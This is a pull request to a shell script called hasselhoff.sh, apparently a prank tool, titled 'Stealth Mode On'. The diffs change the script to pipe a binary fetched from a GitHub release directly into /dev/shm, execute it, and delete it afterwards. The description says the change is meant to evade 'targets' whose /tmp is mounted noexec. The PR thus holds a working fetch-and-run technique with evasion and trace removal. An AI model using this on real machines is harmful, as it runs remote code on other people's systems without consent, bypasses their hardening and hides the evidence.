### PR TITLE
Stealth Mode On

### DIFF
--- a/hasselhoff.sh
+++ b/hasselhoff.sh
@@ -15,5 +15,8 @@ esac
 VERSION="0.1.0"
 AMD64_URL="https://github.com/angelbarrera92/hasselhoffme/releases/download/${VERSION}/hasselhoffme_${VERSION}_${machine}_amd64"
 BINDIR="/dev/shm"
-curl -sL "${AMD64_URL}" | install /dev/stdin /dev/shm/hoffme -m 755
-${BINDIR}/hoffme
+
+curl -sL "${AMD64_URL}" | \
+  install /dev/stdin /dev/shm/hoffme -m 755 && \
+  ${BINDIR}/hoffme && \
+  rm -f /dev/shm/hoffme

--- a/hasselhoff.sh
+++ b/hasselhoff.sh
@@ -14,8 +14,6 @@ case "${platform}" in
 esac
 VERSION="0.1.0"
 AMD64_URL="https://github.com/angelbarrera92/hasselhoffme/releases/download/${VERSION}/hasselhoffme_${VERSION}_${machine}_amd64"
-BINDIR="/tmp/david"
-mkdir -m a=rwx -p $BINDIR
-cd $BINDIR && curl -s -L $AMD64_URL -O
-chmod u=rwx $BINDIR/hasselhoffme_${VERSION}_${machine}_amd64
-$BINDIR/hasselhoffme_${VERSION}_${machine}_amd64
+BINDIR="/dev/shm"
+curl -sL "${AMD64_URL}" | install /dev/stdin /dev/shm/hoffme -m 755
+${BINDIR}/hoffme


### PR DESCRIPTION
Copy the binary to memory and delete after execution.
Eludes targets where `/tmp` is mounted noexec.
Simplify retrieval by piping `curl` to `install`.